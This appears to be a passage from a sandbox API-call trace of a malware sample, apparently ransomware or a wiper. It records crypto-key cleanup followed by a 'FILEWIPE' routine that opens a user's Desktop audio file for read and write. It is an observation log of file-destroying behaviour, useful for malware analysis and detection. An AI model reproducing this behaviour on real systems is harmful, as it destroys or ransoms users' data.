wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.720] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.720] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.720] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.720] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0075.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.720] CryptDestroyKey (hKey=0x6b8af8) returned 1 [0075.722] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.722] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.722] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.722] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.722] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.722] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.722] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.722] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.722] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.722] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0075.722] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.722] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.723] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.723] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.723] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.723] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.723] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.723] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.723] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.723] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.723] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.723] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.723] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.723] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.723] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.723] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.723] CryptReleaseContext (hProv=0x696ad0, dwFlags=0x0) returned 1 [0075.723] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.723] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.723] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.723] FreeLibrary (hLibModule=0x77710000) returned 1 [0075.723] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.723] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.723] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.724] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.724] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.727] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.727] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0075.727] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.727] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.727] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b818900, ftCreationTime.dwHighDateTime=0x1d5d8b1, ftLastAccessTime.dwLowDateTime=0x575d47f0, ftLastAccessTime.dwHighDateTime=0x1d5e344, ftLastWriteTime.dwLowDateTime=0x575d47f0, ftLastWriteTime.dwHighDateTime=0x1d5e344, nFileSizeHigh=0x0, nFileSizeLow=0x12245, dwReserved0=0x0, dwReserved1=0x657690, cFileName="1SXWH1rq8k oa-Gv-.wav", cAlternateFileName="1SXWH1~1.WAV")) returned 0x6b89f8 [0075.727] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.727] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.728] CharLowerBuffW (in: lpsz="byte[74309]", cchLength=0xb | out: lpsz="byte[74309]") returned 0xb [0075.728] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.728] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0075.728] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.728] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0075.728] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0075.728] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.728] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0075.728] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7) returned 0x6bb5f8 [0075.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb5f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0075.728] FreeLibrary (hLibModule=0x76f90000) returned 1 [0075.728] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.728] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.728] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x795ff8 [0075.728] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.728] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.728] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.729] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.729] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0075.729] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.729] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.729] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.729] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.729] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.729] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.729] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.730] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.730] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.730] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.730] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.730] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.730] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.730] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.730] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.730] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.731] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.731] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.731] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.731] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.731] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e060 [0075.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76e060, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0075.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1sxwh1rq8k oa-gv-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0075.732] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.732] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.732] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0075.732] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.732] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.732] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.732] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.732] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.732] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.733] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.733] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.733] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.733] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.733] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.733] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.733] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696a48 [0075.733] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.734] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.734] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.734] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.734] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.734] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.734] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.734] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.734] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.734] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.734] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.735] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.735] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 